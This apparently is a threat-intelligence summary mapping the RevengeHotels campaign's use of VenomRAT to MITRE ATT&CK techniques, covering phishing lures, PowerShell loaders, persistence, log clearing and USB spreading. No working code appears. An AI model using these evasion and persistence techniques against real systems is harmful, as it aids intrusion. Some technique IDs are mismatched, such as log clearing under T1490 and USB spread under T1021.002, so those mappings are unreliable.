RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT

MITRE Techniques

• [T1566] Phishing – Threat actor sends targeted invoicing and job-application emails with links to malicious sites that download script files (“phishing emails with invoicing themes, which urge the recipient to settle overdue payments”).
• [T1204.002] User Execution: Malicious File – Victims execute WScript JS files downloaded from malicious sites (e.g., Fat{NUMBER}.js) that start the infection chain (“download a WScript JS file upon being visited, triggering the infection process”).
• [T1059.001] Command and Scripting Interpreter: PowerShell – Loader saves and executes a PowerShell script (SGDoHBZQ…_{TIMESTAMP}.ps1) that runs Base64-encoded commands to retrieve subsequent payloads (“runs a PowerShell command with Base64-encoded code. This code retrieves the cargajecerrr.txt file from a remote malicious server and invokes it as PowerShell”).
• [T1105] Ingress Tool Transfer – Downloader fetches Base64-encoded files venumentrada.txt and runpe.txt from remote servers and decodes them for execution (“fetching the remaining files from the malicious server and loading them. Both downloaded files are Base64-encoded and have descriptive names: venumentrada.txt … and runpe.txt”).
• [T1569.002] System Services: Service Execution (ngrok tunnel installation) – VenomRAT installs ngrok and receives tunnel parameters from C2 to expose remote services (RDP/VNC) to the internet (“VenomRAT implements tunneling by installing ngrok on the infected computer … token, protocol, and port for the tunnel”).
• [T1106] Native API – VenomRAT modifies process security descriptors and calls native APIs to set SeDebugPrivilege and RtlSetProcessIsCritical for persistence (“sets the SeDebugPrivilege token, enabling it to use the RtlSetProcessIsCritical function to mark itself as a critical system process”).
• [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence via VBS that creates a RunOnce registry entry to relaunch the malware (“creates a new key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce, pointing to the executable path”).
• [T1490] Inhibit System Recovery/Defense Evasion: Clear Windows Event Logs – Malware clears Windows event logs to hinder detection and forensic analysis (“clears all Windows event logs on the compromised system, effectively creating a ‘clean slate’ for its operations”).
• [T1070.004] Indicator Removal on Host: File Deletion (Zone.Identifier) – VenomRAT deletes Zone.Identifier streams to remove Mark of the Web metadata and evade defenses (“deletes the Mark of the Web streams … avoid being quarantined”).
• [T1021.002] Remote Services: SMB/Windows Admin Shares (USB/Removable Media propagation) – Malware copies itself to removable drives under “My Pictures.exe” to spread via USB drives (“scans drive letters from C to M … copies itself to all available drives under the name My Pictures.exe”).